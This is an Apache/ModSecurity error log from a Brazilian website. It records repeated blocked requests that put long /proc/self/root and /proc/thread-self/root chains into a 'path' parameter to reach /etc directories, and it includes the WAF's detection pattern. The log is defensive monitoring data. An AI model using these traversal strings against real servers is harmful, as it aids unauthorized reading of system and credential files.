https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:53:33.603266 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:60180] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo93da6ubjKNq_cu4ZOLAAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:53:34.064820 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.241.31:33442] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo93vu8EFLIOrSqIpvAMQAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 02:53:35.013002 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.243.128:45788] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo93-w_le52K8_3pV2YOwAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 02:53:35.910490 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.241.31:33444] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo939Y0UrI5A3LftIxILQAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:53:44.699016 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.241.31:59092] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo96EzinOy1jxa1j4fKPgAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:53:44.713880 2026] [proxy_fcgi:error] [pid 17653:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:54148] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:53:46.574416 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.241.31:59102] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo96kzinOy1jxa1j4fKPwAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:53:46.574416 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:45804] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo96eoXxyEfFpUF8f8lsQAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Wed Mar 18 02:53:48.150457 2026] [:error] [pid 11816:tid 140411725141760] [client 74.7.241.31:33886] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo97Ow_le52K8_3pV2YQQAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 02:53:49.867670 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.241.31:33894] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo97SmAPhZkrhU8w4knEAAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 02:53:51.828250 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.241.31:33906] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo979Y0UrI5A3LftIxIMgAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 02:53:53.028276 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.241.31:33906] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo98dY0UrI5A3LftIxINAAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:53:55.160678 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.31:33908] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo989Y0UrI5A3LftIxINgAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 02:53:57.095237 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.241.31:33914] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo99dY0UrI5A3LftIxIOAAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:54:08.097836 2026] [proxy_fcgi:error] [pid 31803:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:54492] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:54:09.558516 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:47138] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-Ada6ubjKNq_cu4ZOPgAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:54:10.783849 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:47138] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-Ata6ubjKNq_cu4ZORAAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:54:12.931588 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.241.31:47148] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-BNY0UrI5A3LftIxIPQAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:54:14.234557 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.241.31:47148] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-BtY0UrI5A3LftIxIPgAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:54:16.166611 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.241.31:47164] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-COyqAr6etmhZHNpwqgAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:54:17.456833 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.241.31:47164] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-CeyqAr6etmhZHNpwrAAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:54:19.422091 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.241.31:53468] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-C-oXxyEfFpUF8f8ltQAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 02:54:30.969907 2026] [proxy_fcgi:error] [pid 19507:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:54720] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:54:31.121494 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.241.31:44928] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-F_u8EFLIOrSqIpvAOQAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
